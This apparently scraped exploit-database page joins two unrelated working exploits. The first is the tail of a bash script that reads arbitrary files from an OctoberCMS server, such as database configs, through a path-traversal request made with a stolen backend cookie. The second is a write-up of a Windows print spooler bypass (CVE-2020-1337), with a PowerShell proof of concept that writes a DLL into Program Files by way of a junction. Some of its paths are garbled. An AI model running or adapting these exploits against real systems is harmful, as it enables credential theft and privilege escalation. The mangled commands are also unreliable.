if [[ ! `awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep "Assets"` ]]; then
	echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid"
	echo -e "[*] Exiting!\n"
	exit 0
fi

echo '''
[!] Relative path to the target file is required.
	eg. config/database.php
	If you are unsure about the path, check OctoberCMS github which has the default file system hosted
	https://github.com/octobercms/october
'''

read -p "[*] Enter path to the target file: " targetfile
themename=`grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}'`
csrftoken=`grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}'`

curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres

cat /tmp/ocms_jsonres | jq -r '.tab' 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null

if [[ `cat /tmp/ocms_file` ]]; then
	cp /tmp/ocms_file ./october_extractedfile
	echo -e "\n[+] File saved as ./october_extractedfile!\n"
	exit 1
else
	echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n"
	exit 0
fi
            
Bookmark
Please login to bookmarkClose

Microsoft Windows Local Spooler Bypass Vulnerability

0
mslocalspool
mslocalspool

One way of exploiting this on Windows 10 200x is to understand that FileNormalizedNameInformation will fail if the new path after the mount point is not under the root directory of the server. For example the admin$ share points to c:\\windows. If you set the mount point to write to c:\\Program Files then the normalization process will fail and the original string returned. This allows you to write to anywhere outside the windows directory by placing a mount point somewhere like system32\ asks.

For example the following script will write the DLL to the root of Program Files.

Windows: Local Spooler CVE-2020-1337 Bypass
 

mkdir \"C:\\windows\\system32\  asks\  est\"
Add-PrinterDriver -Name \"Generic / Text Only\" 
Add-PrinterPort -Name \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\" 
Add-Printer -Name \"PrinterExploit\" -DriverName \"Generic / Text Only\" -PortName \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\"
rmdir \"C:\\windows\\system32\  asks\  est\"
New-Item -ItemType Junction -Path \"C:\\windows\\system32\  asks\  est\" -Value \"C:\\Program Files\"
\"TESTTEST\" | Out-Printer -Name \"PrinterExploit\"
 
 
Related CVE Numbers: CVE-2020-1337,CVE-2020-17001,CVE-2020-1337.
 
 
 
Found by: forshaw at google.com
Bookmark
Please login to bookmarkClose